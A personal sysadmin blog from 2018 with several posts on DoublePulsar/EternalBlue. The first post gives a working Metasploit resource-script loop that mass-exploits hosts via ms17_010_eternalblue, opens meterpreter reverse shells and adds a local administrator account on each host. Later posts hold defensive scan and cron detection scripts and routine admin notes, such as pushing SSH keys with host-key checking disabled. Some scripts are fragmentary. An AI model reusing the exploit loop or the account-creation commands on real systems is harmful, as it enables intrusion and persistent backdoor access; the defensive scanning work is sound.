Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
 ## msfconsole
 msf > vulns -R  
 … a lot of text … look at end of output for a file dropped in /tmp e.g. ...  
 RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k  
 msf > exit  
 # cd ~/.msf4/  
 # cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked  
 # msfconsole -r doublepulsar-loop.rc  
 Once all as completed, look through ~/.msf4/logs/doublepuslar.log for adminuser  
 as those hosts have had the local admin user for your evil created.  
## files
 # the rhosts from vuln_db  
 hosts=[],"r") do |f|  
 f.each_line do |line|  
 hosts.push line.strip  
 # msfconsole commands with chained post exploit  
 self.run_single("resource /root/.msf4/doublepulsar.rc")  
 # the rhosts loop  
 hosts.each do |rhost|  
 self.run_single("set rhost #{rhost}")  
 run_single("sleep 2s")  
 spool /root/.msf4/logs/doublepulsar.log  
 set consolelogging true  
 set loglevel 5  
 set sessionlogging true  
 set timestampoutput true  
 use exploit/windows/smb/ms17_010_eternalblue  
 set VerifyArch False  
 set VerifyTarget False  
 set PAYLOAD windows/x64/meterpreter/reverse_tcp  
 set LHOST   
 set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin  
 execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"  
 execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"  
 execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"

Monday, August 13, 2018

one-off doublepulsar scan script because sometimes people need to do one thing and one thing only

so yeah.
 EXECUTE=$(date "+%Y%m%d")  
 read -p "Enter IP to evaluate: " IP  
 if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then  
     read -p "Enter email address (or not): " EMAIL  
 else echo "Not a valid IP" && exit 0  
 rm -rf /tmp/$IP
 mkdir /tmp/$IP  
 cd /tmp/$IP  
 sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"  
 sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > /tmp/$IP/output.msf.1  
 sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN  
 sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED  
 if [ -s /tmp/$IP/output.msf.INFECTED ]  
     echo " Uh oh $IP DoublePulsar infected"  
     mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED  
     mail -s " $IP DoublePulsar intected $EXECUTE " < /tmp/$IP/output.msf.1  
     echo " Phew $IP not infected "  
 if [ -s /tmp/$IP/output.msf.VULN ]  
     echo " Sigh $IP DoublePulsar vulnerable "  
     mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1  
     echo " Double Phew $IP not DoublePulsar vulnerable"  
 cd /tmp  
 rm -rf /tmp/$IP  
 exit 0  

Friday, July 20, 2018

cron job for doublepulsar detection, burning, metasploit scan, and email of results

double pulsar is a major drag. it is a nasty worm that hangs out and acts as a backdoor on a system. it is propagated by smbv1 trans2 calls. fun stuff. i needed to figure out how to automate discovery, burning, and identification of vulnerable systems. oh, and email me the results.

here's what i came up with:
$ dpkg-reconfigure exim4-config
$ apt-get install msf
$ searchsploit -u
$ apt-get install masscan
$ git clone
$ mkdir -p /root/scripts
$ mkdir -p /root/to.process
$ touch /root/to.process ; echo "." >> /tmp/to.process/empty

-- script doublepulsar.cron in /root/scripts --

EXECUTE=$(date "+%Y%m%d")


masscan -p445 $NETWORKRANGE > $PROCESS/output.masscan
sed -i "s/^.* on //" $PROCESS/output.masscan

/root/doublepulsar-detection-script/ --file \
$PROCESS/output.masscan --uninstall --threads 100 --timeout 2 > \
sed '/DETECTED/!d' $PROCESS/output.detect > $PROCESS/output.detect.INFECTED

msfconsole -x "color false ; spool $PROCESS/output.msf ; \
use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS file:$PROCESS/output.masscan ; set thread 100; run; exit"
sed 's/]\ /\\\n/g' $PROCESS/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > $PROCESS/output.msf.1
sed '/VULNERABLE/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.VULN
sed '/INFECTED/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.INFECTED

if [ -s $PROCESS/output.detect.INFECTED ]
        mail -s "DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/output.detect.INFECTED
        mail -s "No DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/empty

if [ -s $PROCESS/output.msf.INFECTED ]
        cat $PROCESS/output.msf.INFECTED $PROCESS/output.msf.VULN >> $PROCESS/output.msf.INFECTEDVULN
        mail -s "DoublePulsar MetaSploit Infected and Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/output.msf.INFECTEDVULN
        mail -s "No DoublePulsar MetaSploit Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/empty



-- end script --
run it every night, every hour, whenever. put it in /etc/crontab:
# evil
30 12   * * *   root    /root/scripts/doublepulsar.cron
the joy of the script is that with all the text processing, is it can be piped to syslog. so yeah, old news for you...

Thursday, March 22, 2018

nis master server settings on cloned system

 i need to change nis master server settings on cloned system. don't even ask.  
 # domainname <newdomainname>  
 # mv /var/yp/<domainname> to <newdomainname>  
 /etc/hosts change <hostname> to <newhostname> ; <ip> to <newip>  
 /etc/conf.d/net change <domainname> to <newdomainname>  
 /etc/yp.conf change <domainname> to <newdomainname>  
 /var/yp/ypservers change <hostname> to <newhostname>  
 make -C /var/yp  
 # ypwhich  
 Should return <newhostname>  
 # ypcat passwd | grep <username>  
 # ypcat group | grep <groupname>  
 Both should return known results  

Wednesday, March 7, 2018

put pubkeys on a lot of hosts

 i need to zap authorized_keys *all over the place*  
 this concatenates a file which contains sever keys.  
 nodes is a long list of ip addresses.  
 for i in `cat nodes` ; do  
    cat authorized_keys.add | ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o \  
    UserKnownHostsFile=/dev/null -t -t -t -l root $i 'cat >> /root/.ssh/authorized_keys'  

Thursday, February 8, 2018

when crond is using /bin/sh

 crond uses sh by default. that last cron script i posted, well tee is broke in sh. do this:

0 12 * * * root 2>&1 | bash -c 'tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null'   

Monday, February 5, 2018

debug rsyslogd

 why isn't rsyslogd sending anything out?  
 window 1 $ tcpdump -u dst port 514  
 window 2 $ logger -n -P 514 "hello god"  
 <no answer>  
 hmm. let's debug rsyslogd  
 $ export RSYSLOG_DEBUGLOG="/tmp/debuglog"  
 $ export RSYSLOG_DEBUG="Debug"  
 $ service rsyslog stop  
 $ rsyslogd -d | head -10   
 7160.005597645:7fae096a3780: rsyslogd 7.2.6 startup, module path '', cwd:/root  
 7160.005872662:7fae096a3780: caller requested object 'net', not found (iRet -3003)  
 7160.005895004:7fae096a3780: Requested to load module 'lmnet'  
 7160.005906331:7fae096a3780: loading module '/lib64/rsyslog/'  
 7160.006023505:7fae096a3780: module lmnet of type 2 being loaded (keepType=0).  
 7160.006030872:7fae096a3780: entry point 'isCompatibleWithFeature' not present in module  
 7160.006033780:7fae096a3780: entry point 'setModCnf' not present in module  
 7160.006036209:7fae096a3780: entry point 'getModCnfName' not present in module  
 7160.006038359:7fae096a3780: entry point 'beginCnfLoad' not present in module  
 bad modules.